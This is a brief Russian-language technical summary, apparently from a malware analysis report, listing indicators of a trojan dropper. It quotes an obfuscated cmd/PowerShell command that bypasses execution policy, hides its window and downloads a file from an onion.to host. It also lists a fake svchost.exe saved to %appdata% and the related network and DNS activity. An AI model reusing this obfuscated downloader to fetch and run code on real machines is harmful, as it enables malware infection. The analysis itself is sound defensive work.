Техническая информация
- https://hl3gj7zkxjvo6cra.onion.to/svchost.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OwERshEl^l.^eXe -E^X^eCUtI^onp^O^l^icY^ b^yP^ASs -NoprO^F^ile ^-w^indo^wST^Y^lE hiDDe^n (nEw-oBJ^E^c^T s^YsTeM.NET.^w^E^bc^LIeNT).DO^WnlOaDfiL^E^('https://hl3gj7zkxjvo...
- 'hl######xjvo6cra.onion.to':443
- DNS ASK hl######xjvo6cra.onion.to
- '<SYSTEM32>\cmd.exe' /C "P^OwERshEl^l.^eXe -E^X^eCUtI^onp^O^l^icY^ b^yP^ASs -NoprO^F^ile ^-w^indo^wST^Y^lE hiDDe^n (nEw-oBJ^E^c^T s^YsTeM.NET.^w^E^bc^LIeNT).DO^WnlOaDfiL^E^('https://hl3gj7zkxjvo...' (со скрытым окном)